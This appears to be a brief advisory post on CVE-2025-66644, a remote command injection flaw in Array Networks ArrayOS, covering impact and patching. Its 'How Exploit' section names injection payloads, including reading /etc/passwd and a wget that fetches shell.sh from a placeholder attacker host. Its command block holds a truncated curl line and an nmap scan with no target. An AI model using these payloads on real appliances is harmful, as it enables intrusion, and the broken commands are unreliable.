The CVE-2025-66644 vulnerability in Array Networks ArrayOS stems from insufficient input validation and sanitization in one of the device’s web management interfaces or API endpoints. An attacker can craft a malicious HTTP request containing operating system commands within specific, improperly handled parameters. When this tainted input is processed by the vulnerable component, the OS commands are concatenated and executed with the privileges of the underlying system process, typically running as root or a high-privilege service account. This allows an unauthenticated or authenticated remote attacker, depending on the exposed interface, to achieve arbitrary command execution on the underlying ArrayOS appliance, leading to full system compromise.
Platform: Array Networks ArrayOS
Version: Before 9.4.5.9
Vulnerability: Remote Command Injection
Severity: Critical
Date: 2025-08 to 2025-12
Prediction: Patch Expected 2025-12-15
What Undercode Say:
`curl -iks “https://
`nmap –script http-command-injection -p443 `
`grep -r “system\|exec\|popen” /path/to/cgi/`
How Exploit:
Craft malicious HTTP POST/GET requests with shell metacharacters (e.g., ;, &, |, `) embedded in parameters like ‘username’ or ‘filename’ to inject and execute commands such as ‘cat /etc/passwd’ or ‘wget http://attacker.com/shell.sh’.
Protection from this CVE:
Apply vendor patch (ArrayOS 9.4.5.9+). Implement strict input validation and sanitization for all user-supplied data. Use web application firewalls (WAF) with command injection rules. Restrict administrative interface access.
Impact:
Full root-level compromise of the ArrayOS gateway appliance, enabling data exfiltration, network traffic manipulation, creation of persistent backdoors, and lateral movement into connected network segments.
